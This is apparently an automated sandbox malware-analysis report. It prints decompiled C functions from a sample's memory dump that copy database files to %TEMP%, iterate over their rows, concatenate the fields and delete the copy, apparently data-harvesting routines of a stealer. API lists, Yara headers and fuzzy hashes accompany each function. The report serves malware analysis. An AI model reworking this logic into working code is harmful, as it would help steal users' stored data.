                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = _t70;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				_push(_t229);
                                                                                                                                                                                          				_push(0x411163);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t230;
                                                                                                                                                                                          				E00403B80( &_v28);
                                                                                                                                                                                          				_push(_t229);
                                                                                                                                                                                          				_push(0x4110ce);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t230;
                                                                                                                                                                                          				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t238);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				E00406F1C( &_v56, __ebx, __edi, __esi, _t238);
                                                                                                                                                                                          				_push(_v56);
                                                                                                                                                                                          				_push(L".tmp");
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v8, _t189,  &_v40, _t238);
                                                                                                                                                                                          				E004062D8(L"%TEMP%",  &_v64, _t238);
                                                                                                                                                                                          				_push(_v64);
                                                                                                                                                                                          				_push(0x41119c);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v60, _t189,  &_v44, _t238);
                                                                                                                                                                                          				_t90 = E00403D3C(_v44);
                                                                                                                                                                                          				CopyFileW(E00403D3C(_v40), _t90, 0xffffffff);
                                                                                                                                                                                          				E0040377C( &_v68, _v44);
                                                                                                                                                                                          				E00404AFC(_v68, _t189, _t190,  &_v36, _t227, _t238);
                                                                                                                                                                                          				E00403D2C( &_v72, _v36);
                                                                                                                                                                                          				if(E004076B0(_v72, _t189, _t190) != 0) {
                                                                                                                                                                                          					_t105 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                          					_t107 =  *((intOrPtr*)( *_t105))(E00403990(_v36),  &_v16);
                                                                                                                                                                                          					_t231 = _t230 + 8;
                                                                                                                                                                                          					__eflags = _t107;
                                                                                                                                                                                          					if(_t107 == 0) {
                                                                                                                                                                                          						E00408120(0x66,  &_v76);
                                                                                                                                                                                          						_t150 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                          						_t152 =  *((intOrPtr*)( *_t150))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                          						_t232 = _t231 + 0x14;
                                                                                                                                                                                          						__eflags = _t152;
                                                                                                                                                                                          						if(_t152 == 0) {
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t154 =  *0x41b600; // 0x41c790
                                                                                                                                                                                          								_t156 =  *((intOrPtr*)( *_t154))(_v20);
                                                                                                                                                                                          								__eflags = _t156 - 0x64;
                                                                                                                                                                                          								if(_t156 != 0x64) {
                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t158 =  *0x41b644; // 0x41c798
                                                                                                                                                                                          								_t162 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t164 =  *((intOrPtr*)( *_t162))(_v20, 3,  *((intOrPtr*)( *_t158))(_v20, 3));
                                                                                                                                                                                          								_pop(_t219);
                                                                                                                                                                                          								E004094C4(_t164,  &_v48, _t219);
                                                                                                                                                                                          								E00403D2C( &_v80, _v48);
                                                                                                                                                                                          								_t169 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E00403C98( &_v84,  *((intOrPtr*)( *_t169))(_v20, 0, 0x4111a4, _v80, _v28));
                                                                                                                                                                                          								_t175 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E00403C98( &_v88,  *((intOrPtr*)( *_t175))(_v20, 1, 0x4111a4, _v84));
                                                                                                                                                                                          								_t181 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t183 =  *((intOrPtr*)( *_t181))(_v20, 2, 0x4111b0, _v88);
                                                                                                                                                                                          								_t232 = _t232 + 0x28;
                                                                                                                                                                                          								E00403C98( &_v92, _t183);
                                                                                                                                                                                          								_push(_v92);
                                                                                                                                                                                          								_push(L"\r\n\r\n");
                                                                                                                                                                                          								E00403E1C();
                                                                                                                                                                                          								_t187 =  *0x41b584; // 0x41b0b4
                                                                                                                                                                                          								 *_t187 =  *_t187 + 1;
                                                                                                                                                                                          								__eflags =  *_t187;
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L10:
                                                                                                                                                                                          					_t109 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                          					 *((intOrPtr*)( *_t109))(_v20);
                                                                                                                                                                                          					_t113 =  *0x41b590; // 0x41c788
                                                                                                                                                                                          					 *((intOrPtr*)( *_t113))(_v16);
                                                                                                                                                                                          					_pop(_t211);
                                                                                                                                                                                          					 *[fs:eax] = _t211;
                                                                                                                                                                                          					E00403BBC(_v12, _v28);
                                                                                                                                                                                          					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_pop(_t225);
                                                                                                                                                                                          					 *[fs:eax] = _t225;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t213);
                                                                                                                                                                                          				 *[fs:eax] = _t213;
                                                                                                                                                                                          				_push(E0041116A);
                                                                                                                                                                                          				E00403B98( &_v92, 4);
                                                                                                                                                                                          				E004034E4( &_v76);
                                                                                                                                                                                          				E00403B80( &_v72);
                                                                                                                                                                                          				E004034E4( &_v68);
                                                                                                                                                                                          				E00403B98( &_v64, 4);
                                                                                                                                                                                          				E004034E4( &_v48);
                                                                                                                                                                                          				E00403B98( &_v44, 2);
                                                                                                                                                                                          				E004034E4( &_v36);
                                                                                                                                                                                          				E00403B98( &_v32, 2);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}





















































                                                                                                                                                                                          0x00410f60
                                                                                                                                                                                          0x00410f7c
                                                                                                                                                                                          0x00410f83
                                                                                                                                                                                          0x00410f85
                                                                                                                                                                                          0x00410f88
                                                                                                                                                                                          0x00410f8a
                                                                                                                                                                                          0x00410fa2
                                                                                                                                                                                          0x00410fb4
                                                                                                                                                                                          0x00410fbb
                                                                                                                                                                                          0x00410fbd
                                                                                                                                                                                          0x00410fc0
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00411095
                                                                                                                                                                                          0x0041109c
                                                                                                                                                                                          0x0041109f
                                                                                                                                                                                          0x004110a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410fd3
                                                                                                                                                                                          0x00410fe6
                                                                                                                                                                                          0x00410fed
                                                                                                                                                                                          0x00410ff5
                                                                                                                                                                                          0x00410ff6
                                                                                                                                                                                          0x00411004
                                                                                                                                                                                          0x00411017
                                                                                                                                                                                          0x00411028
                                                                                                                                                                                          0x0041103b
                                                                                                                                                                                          0x0041104c
                                                                                                                                                                                          0x0041105f
                                                                                                                                                                                          0x00411066
                                                                                                                                                                                          0x00411068
                                                                                                                                                                                          0x00411070
                                                                                                                                                                                          0x00411075
                                                                                                                                                                                          0x00411078
                                                                                                                                                                                          0x00411085
                                                                                                                                                                                          0x0041108a
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x004110a8
                                                                                                                                                                                          0x004110ac
                                                                                                                                                                                          0x004110b3
                                                                                                                                                                                          0x004110ba
                                                                                                                                                                                          0x004110c1
                                                                                                                                                                                          0x004110c6
                                                                                                                                                                                          0x004110c9
                                                                                                                                                                                          0x004110de
                                                                                                                                                                                          0x004110ec
                                                                                                                                                                                          0x00410f62
                                                                                                                                                                                          0x00410f64
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x004110f3
                                                                                                                                                                                          0x004110f6
                                                                                                                                                                                          0x004110f9
                                                                                                                                                                                          0x00411106
                                                                                                                                                                                          0x0041110e
                                                                                                                                                                                          0x00411116
                                                                                                                                                                                          0x0041111e
                                                                                                                                                                                          0x0041112b
                                                                                                                                                                                          0x00411133
                                                                                                                                                                                          0x00411140
                                                                                                                                                                                          0x00411148
                                                                                                                                                                                          0x00411155
                                                                                                                                                                                          0x00411162

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CopyCountFileTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 3448371392-3650661790
                                                                                                                                                                                          • Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                                                                                                                                          • Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E00410BB0(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                          				WCHAR* _t78;
                                                                                                                                                                                          				intOrPtr* _t93;
                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                          				intOrPtr* _t97;
                                                                                                                                                                                          				intOrPtr* _t101;
                                                                                                                                                                                          				intOrPtr* _t134;
                                                                                                                                                                                          				void* _t136;
                                                                                                                                                                                          				intOrPtr* _t138;
                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                          				intOrPtr* _t142;
                                                                                                                                                                                          				intOrPtr* _t148;
                                                                                                                                                                                          				void* _t150;
                                                                                                                                                                                          				void* _t156;
                                                                                                                                                                                          				intOrPtr _t176;
                                                                                                                                                                                          				intOrPtr _t178;
                                                                                                                                                                                          				intOrPtr _t186;
                                                                                                                                                                                          				intOrPtr _t190;
                                                                                                                                                                                          				intOrPtr _t191;
                                                                                                                                                                                          				void* _t192;
                                                                                                                                                                                          				void* _t193;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t188 = __esi;
                                                                                                                                                                                          				_t155 = __ebx;
                                                                                                                                                                                          				_t57 = __eax +  *__eax;
                                                                                                                                                                                          				 *_t57 =  *_t57 + _t57;
                                                                                                                                                                                          				_t58 = _t57 | 0x5500000a;
                                                                                                                                                                                          				_t190 = _t191;
                                                                                                                                                                                          				_t156 = 9;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t156 = _t156 - 1;
                                                                                                                                                                                          					_t197 = _t156;
                                                                                                                                                                                          				} while (_t156 != 0);
                                                                                                                                                                                          				_push(_t156);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = _t58;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				_push(_t190);
                                                                                                                                                                                          				_push(0x410e20);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t191;
                                                                                                                                                                                          				E00403B80( &_v28);
                                                                                                                                                                                          				_push(_t190);
                                                                                                                                                                                          				_push(0x410da0);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t191;
                                                                                                                                                                                          				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t197);
                                                                                                                                                                                          				_push(_v48);
                                                                                                                                                                                          				E00406F1C( &_v52, __ebx, __edi, __esi, _t197);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				_push(L".tmp");
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v8, _t155,  &_v40, _t197);
                                                                                                                                                                                          				E004062D8(L"%TEMP%",  &_v60, _t197);
                                                                                                                                                                                          				_push(_v60);
                                                                                                                                                                                          				_push(E00410E58);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v56, _t155,  &_v44, _t197);
                                                                                                                                                                                          				_t78 = E00403D3C(_v44);
                                                                                                                                                                                          				CopyFileW(E00403D3C(_v40), _t78, 0xffffffff);
                                                                                                                                                                                          				E0040377C( &_v64, _v44);
                                                                                                                                                                                          				E00404AFC(_v64, _t155, _t156,  &_v36, _t188, _t197);
                                                                                                                                                                                          				E00403D2C( &_v68, _v36);
                                                                                                                                                                                          				if(E004076B0(_v68, _t155, _t156) != 0) {
                                                                                                                                                                                          					_t93 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                          					_t95 =  *((intOrPtr*)( *_t93))(E00403990(_v36),  &_v16);
                                                                                                                                                                                          					_t192 = _t191 + 8;
                                                                                                                                                                                          					__eflags = _t95;
                                                                                                                                                                                          					if(_t95 == 0) {
                                                                                                                                                                                          						E00408120(0x65,  &_v72);
                                                                                                                                                                                          						_t134 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                          						_t136 =  *((intOrPtr*)( *_t134))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                          						_t193 = _t192 + 0x14;
                                                                                                                                                                                          						__eflags = _t136;
                                                                                                                                                                                          						if(_t136 == 0) {
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t138 =  *0x41b600; // 0x41c790
                                                                                                                                                                                          								_t140 =  *((intOrPtr*)( *_t138))(_v20);
                                                                                                                                                                                          								__eflags = _t140 - 0x64;
                                                                                                                                                                                          								if(_t140 != 0x64) {
                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t142 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E00403C98( &_v76,  *((intOrPtr*)( *_t142))(_v20, 0, _v28));
                                                                                                                                                                                          								_t148 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t150 =  *((intOrPtr*)( *_t148))(_v20, 1, E00410E60, _v76);
                                                                                                                                                                                          								_t193 = _t193 + 0x10;
                                                                                                                                                                                          								E00403C98( &_v80, _t150);
                                                                                                                                                                                          								_push(_v80);
                                                                                                                                                                                          								_push(E00410E68);
                                                                                                                                                                                          								E00403E1C();
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L11:
                                                                                                                                                                                          					_t97 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                          					 *((intOrPtr*)( *_t97))(_v20);
                                                                                                                                                                                          					_t101 =  *0x41b590; // 0x41c788
                                                                                                                                                                                          					 *((intOrPtr*)( *_t101))(_v16);
                                                                                                                                                                                          					_pop(_t176);
                                                                                                                                                                                          					 *[fs:eax] = _t176;
                                                                                                                                                                                          					E00403BBC(_v12, _v28);
                                                                                                                                                                                          					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_pop(_t186);
                                                                                                                                                                                          					 *[fs:eax] = _t186;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t178);
                                                                                                                                                                                          				 *[fs:eax] = _t178;
                                                                                                                                                                                          				_push(E00410E27);
                                                                                                                                                                                          				E00403B98( &_v80, 2);
                                                                                                                                                                                          				E004034E4( &_v72);
                                                                                                                                                                                          				E00403B80( &_v68);
                                                                                                                                                                                          				E004034E4( &_v64);
                                                                                                                                                                                          				E00403B98( &_v60, 6);
                                                                                                                                                                                          				E004034E4( &_v36);
                                                                                                                                                                                          				E00403B98( &_v32, 2);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}












































                                                                                                                                                                                          0x00410d85
                                                                                                                                                                                          0x00410d8c
                                                                                                                                                                                          0x00410d93
                                                                                                                                                                                          0x00410d98
                                                                                                                                                                                          0x00410d9b
                                                                                                                                                                                          0x00410db0
                                                                                                                                                                                          0x00410dbe
                                                                                                                                                                                          0x00410cab
                                                                                                                                                                                          0x00410cad
                                                                                                                                                                                          0x00410cb0
                                                                                                                                                                                          0x00410cb0
                                                                                                                                                                                          0x00410dc5
                                                                                                                                                                                          0x00410dc8
                                                                                                                                                                                          0x00410dcb
                                                                                                                                                                                          0x00410dd8
                                                                                                                                                                                          0x00410de0
                                                                                                                                                                                          0x00410de8
                                                                                                                                                                                          0x00410df0
                                                                                                                                                                                          0x00410dfd
                                                                                                                                                                                          0x00410e05
                                                                                                                                                                                          0x00410e12
                                                                                                                                                                                          0x00410e1f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CopyCountFileTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 3448371392-3650661790
                                                                                                                                                                                          • Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                                                                                                                                          • Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                                                                                                                                          • Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00410BB4(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                          				WCHAR* _t77;
                                                                                                                                                                                          				intOrPtr* _t92;
                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                          				intOrPtr* _t96;
                                                                                                                                                                                          				intOrPtr* _t100;
                                                                                                                                                                                          				intOrPtr* _t133;
                                                                                                                                                                                          				void* _t135;
                                                                                                                                                                                          				intOrPtr* _t137;
                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                          				intOrPtr* _t141;
                                                                                                                                                                                          				intOrPtr* _t147;
                                                                                                                                                                                          				void* _t149;
                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                          				intOrPtr _t175;
                                                                                                                                                                                          				intOrPtr _t177;
                                                                                                                                                                                          				intOrPtr _t185;
                                                                                                                                                                                          				intOrPtr _t189;
                                                                                                                                                                                          				intOrPtr _t190;
                                                                                                                                                                                          				void* _t191;
                                                                                                                                                                                          				void* _t192;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t187 = __esi;
                                                                                                                                                                                          				_t154 = __ebx;
                                                                                                                                                                                          				_t57 = __eax | 0x5500000a;
                                                                                                                                                                                          				_t189 = _t190;
                                                                                                                                                                                          				_t155 = 9;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t155 = _t155 - 1;
                                                                                                                                                                                          					_t195 = _t155;
                                                                                                                                                                                          				} while (_t155 != 0);
                                                                                                                                                                                          				_push(_t155);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = _t57;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				_push(_t189);
                                                                                                                                                                                          				_push(0x410e20);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t190;
                                                                                                                                                                                          				E00403B80( &_v28);
                                                                                                                                                                                          				_push(_t189);
                                                                                                                                                                                          				_push(0x410da0);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t190;
                                                                                                                                                                                          				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t195);
                                                                                                                                                                                          				_push(_v48);
                                                                                                                                                                                          				E00406F1C( &_v52, __ebx, __edi, __esi, _t195);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				_push(L".tmp");
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v8, _t154,  &_v40, _t195);
                                                                                                                                                                                          				E004062D8(L"%TEMP%",  &_v60, _t195);
                                                                                                                                                                                          				_push(_v60);
                                                                                                                                                                                          				_push(E00410E58);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v56, _t154,  &_v44, _t195);
                                                                                                                                                                                          				_t77 = E00403D3C(_v44);
                                                                                                                                                                                          				CopyFileW(E00403D3C(_v40), _t77, 0xffffffff);
                                                                                                                                                                                          				E0040377C( &_v64, _v44);
                                                                                                                                                                                          				E00404AFC(_v64, _t154, _t155,  &_v36, _t187, _t195);
                                                                                                                                                                                          				E00403D2C( &_v68, _v36);
                                                                                                                                                                                          				if(E004076B0(_v68, _t154, _t155) != 0) {
                                                                                                                                                                                          					_t92 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                          					_t94 =  *((intOrPtr*)( *_t92))(E00403990(_v36),  &_v16);
                                                                                                                                                                                          					_t191 = _t190 + 8;
                                                                                                                                                                                          					__eflags = _t94;
                                                                                                                                                                                          					if(_t94 == 0) {
                                                                                                                                                                                          						E00408120(0x65,  &_v72);
                                                                                                                                                                                          						_t133 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                          						_t135 =  *((intOrPtr*)( *_t133))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                          						_t192 = _t191 + 0x14;
                                                                                                                                                                                          						__eflags = _t135;
                                                                                                                                                                                          						if(_t135 == 0) {
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t137 =  *0x41b600; // 0x41c790
                                                                                                                                                                                          								_t139 =  *((intOrPtr*)( *_t137))(_v20);
                                                                                                                                                                                          								__eflags = _t139 - 0x64;
                                                                                                                                                                                          								if(_t139 != 0x64) {
                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t141 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E00403C98( &_v76,  *((intOrPtr*)( *_t141))(_v20, 0, _v28));
                                                                                                                                                                                          								_t147 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t149 =  *((intOrPtr*)( *_t147))(_v20, 1, E00410E60, _v76);
                                                                                                                                                                                          								_t192 = _t192 + 0x10;
                                                                                                                                                                                          								E00403C98( &_v80, _t149);
                                                                                                                                                                                          								_push(_v80);
                                                                                                                                                                                          								_push(E00410E68);
                                                                                                                                                                                          								E00403E1C();
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L10:
                                                                                                                                                                                          					_t96 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                          					 *((intOrPtr*)( *_t96))(_v20);
                                                                                                                                                                                          					_t100 =  *0x41b590; // 0x41c788
                                                                                                                                                                                          					 *((intOrPtr*)( *_t100))(_v16);
                                                                                                                                                                                          					_pop(_t175);
                                                                                                                                                                                          					 *[fs:eax] = _t175;
                                                                                                                                                                                          					E00403BBC(_v12, _v28);
                                                                                                                                                                                          					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_pop(_t185);
                                                                                                                                                                                          					 *[fs:eax] = _t185;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t177);
                                                                                                                                                                                          				 *[fs:eax] = _t177;
                                                                                                                                                                                          				_push(E00410E27);
                                                                                                                                                                                          				E00403B98( &_v80, 2);
                                                                                                                                                                                          				E004034E4( &_v72);
                                                                                                                                                                                          				E00403B80( &_v68);
                                                                                                                                                                                          				E004034E4( &_v64);
                                                                                                                                                                                          				E00403B98( &_v60, 6);
                                                                                                                                                                                          				E004034E4( &_v36);
                                                                                                                                                                                          				E00403B98( &_v32, 2);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CopyCountFileTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 3448371392-3650661790
                                                                                                                                                                                          • Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                                                                                                                                          • Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                          			E0040DDB0(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                          				WCHAR* _t51;
                                                                                                                                                                                          				int _t54;
                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                          				intOrPtr _t63;
                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t74 = __esi;
                                                                                                                                                                                          				_t73 = __edi;
                                                                                                                                                                                          				_t63 = __edx;
                                                                                                                                                                                          				_t59 = __ebx;
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
